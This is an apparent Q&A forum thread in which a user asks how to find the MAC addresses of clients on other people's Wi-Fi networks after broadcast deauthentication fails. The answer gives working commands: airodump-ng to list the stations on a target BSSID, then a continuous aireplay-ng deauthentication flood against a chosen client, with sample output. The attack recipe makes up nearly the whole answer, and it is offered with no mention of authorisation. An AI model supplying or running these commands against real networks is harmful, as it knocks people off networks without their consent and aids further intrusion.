Broadcast deauth requests are not working

Question

While using aireplay-ng broadcast deauth requests are not working but if i use deauth for specific user it's working fine. But the problem is i don't know how to get the Mac address of specific user. While trying on your own system it's easy you can just check for your own mac address. But how to get mac address of users on different network? Is there any way to overcome this! Thank you for your time.

Answer 1

If you are after just any user on that network, you can use airodump-ng on a specific BSSID. For example, running the command airodump-ng wlan0mon --bssid 00:00:00:00:00:AA --channel 1. Here is a sample output of the command:

 CH  1 ][ Elapsed: 10 s ][ 2016-12-31 12:00                              

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:00:00:00:00:AA  -59  93      112      698   69   1  54e  WPA2 CCMP   PSK  Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:00:00:00:00:AA  00:00:00:00:00:AB  -37    0e- 0e     0      696
 00:00:00:00:00:AA  00:00:00:00:00:AC  -47    0 - 1      0       24
 00:00:00:00:00:AA  00:00:00:00:00:AD  -66    0 - 1      0       52

As you can see, running the above command outputs the BSSID, as well as the devices connected to the BSSID (00:00:00:00:00:AB, 00:00:00:00:00:AC, and 00:00:00:00:00:AD). Now you can use the command aireplay-ng --deauth 0 -a 00:00:00:00:00:AA -c 00:00:00:00:00:AB wlan0mon to deauthenticate the specific client.

Make sure to subsitute this example with your own WiFi card, BSSID MAC address, and channel number. The BSSID and channel you're after can be found by using airodump-ng wlan0mon, again using your WiFi card.